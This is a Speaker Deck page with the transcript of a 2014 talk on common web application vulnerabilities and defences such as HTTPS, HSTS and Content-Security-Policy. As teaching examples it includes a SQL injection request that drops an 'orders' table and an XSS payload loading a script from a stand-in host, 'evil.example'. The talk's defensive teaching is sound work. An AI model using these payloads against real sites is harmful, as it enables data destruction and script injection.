Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
There Is No Silver Bullet
Search
Sponsored
·
Ship Features Fearlessly
Turn features on and off without deploys. Used by thousands of Ruby developers.
→
Harley Watson
November 29, 2014
Programming
0
970
There Is No Silver Bullet
Harley Watson
November 29, 2014
Tweet
Share
More Decks by Harley Watson
See All by Harley Watson
paper tickets > smartcards, probably.
unlobito
0
7.8k
one, two step
unlobito
0
830
What's in your pocket? (BSides Manchester)
unlobito
0
1k
sorry, we're cash only. (securi-tay)
unlobito
1
1.2k
Sorry, we're cash only. (hacksoc)
unlobito
0
110
There Is No Silver Bullet (Español)
unlobito
0
170
Other Decks in Programming
See All in Programming
CSC307 Lecture 06
javiergs
PRO
0
680
OCaml 5でモダンな並列プログラミングを Enjoyしよう!
haochenx
0
110
副作用をどこに置くか問題:オブジェクト指向で整理する設計判断ツリー
koxya
1
570
Python札幌 LT資料
t3tra
7
1.1k
CSC307 Lecture 07
javiergs
PRO
0
530
Architectural Extensions
denyspoltorak
0
260
カスタマーサクセス業務を変革したヘルススコアの実現と学び
_hummer0724
0
490
AI時代のキャリアプラン「技術の引力」からの脱出と「問い」へのいざない / tech-gravity
minodriven
13
3.7k
そのAIレビュー、レビューしてますか? / Are you reviewing those AI reviews?
rkaga
6
4.4k
AgentCoreとHuman in the Loop
har1101
5
210
humanlayerのブログから学ぶ、良いCLAUDE.mdの書き方
tsukamoto1783
0
170
Implementation Patterns
denyspoltorak
0
270
Featured
See All Featured
The Curse of the Amulet
leimatthew05
1
8k
Odyssey Design
rkendrick25
PRO
1
480
Docker and Python
trallard
47
3.7k
Ecommerce SEO: The Keys for Success Now & Beyond - #SERPConf2024
aleyda
1
1.8k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
34
2.6k
Intergalactic Javascript Robots from Outer Space
tanoku
273
27k
Large-scale JavaScript Application Architecture
addyosmani
515
110k
Performance Is Good for Brains [We Love Speed 2024]
tammyeverts
12
1.4k
Dominate Local Search Results - an insider guide to GBP, reviews, and Local SEO
greggifford
PRO
0
52
Testing 201, or: Great Expectations
jmmastey
46
8k
Fireside Chat
paigeccino
41
3.8k
Ten Tips & Tricks for a 🌱 transition
stuffmc
0
61
Transcript
there is no silver bullet Henri Watson
Which vulnerabili.es commonly affect web applica.ons in the
Dominican Republic?
No HTTPS
Using HTTPS won’t cost you an arm and a
leg.
The current proposal for HTTP/2.0 requires TLS.
If you decide to use HTTPS, also use Strict-‐Transport-‐Security
and ssllabs.com/ssltest
SQL Injec.ons
GET /tracker?order=12345”; DROP TABLE orders;-‐-‐ SELECT * FROM
orders WHERE order = “12345”; DROP TABLE orders;-‐-‐” AND status = “pending” Request from the client to the server Request from the webserver to the database
None
None
None
Authen.ca.on Implementa.on Mistakes
None
None
Cross-‐Site Scrip.ng (XSS)
GET /hi?name=<script src=“hep://evil.example/ l33thax.js”></script> Hello, <script src=“hep://evil.example/ l33thax.js”></script>!
Request from the client to the server Reply from the server to the client
Content-‐Security-‐Policy
Exposure of Sensi.ve Data
None
Using Components With Known Vulnerabili.es
Mailing Lists • bugtraq hep://www.securityfocus.com/archive/1 • debian-‐security-‐announce
heps://lists.debian.org/debian-‐security-‐announce/ • fulldisclosure hep://nmap.org/mailman/lis.nfo/fulldisclosure
Mailing Lists •
[email protected]
heps://hepd.apache.org/lists.html#hep-‐announce • nginx-‐announce
hep://mailman.nginx.org/mailman/lis.nfo/nginx-‐ announce • php-‐announce hep://php.net/mailing-‐lists.php
None
Customer Service
None
Why is there no “silver bullet”?
Informa.on security is a constant investment.
Heartbleed
By placing your users’ informa.on at risk, you also
risk ruining your company’s reputa.on.
Thanks! @henriwatson
[email protected]
heps://henriwatson.com/talks/silverbullet
unlobito
javiergs
haochenx
koxya
t3tra
denyspoltorak
_hummer0724
minodriven
rkaga
har1101
tsukamoto1783
leimatthew05
rkendrick25
trallard
aleyda
jcasabona
tanoku
addyosmani
tammyeverts
greggifford
jmmastey
paigeccino
stuffmc
![Mailing Lists • [email protected] heps://hepd.apache.org/lists.html#hep-‐announce • nginx-‐announce](https://files.speakerdeck.com/presentations/36f0f0905a6301327a56624406239a1c/slide_21.jpg){kind=link}
![Thanks! @henriwatson [email protected] heps://henriwatson.com/talks/silverbullet](https://files.speakerdeck.com/presentations/36f0f0905a6301327a56624406239a1c/slide_29.jpg){kind=link}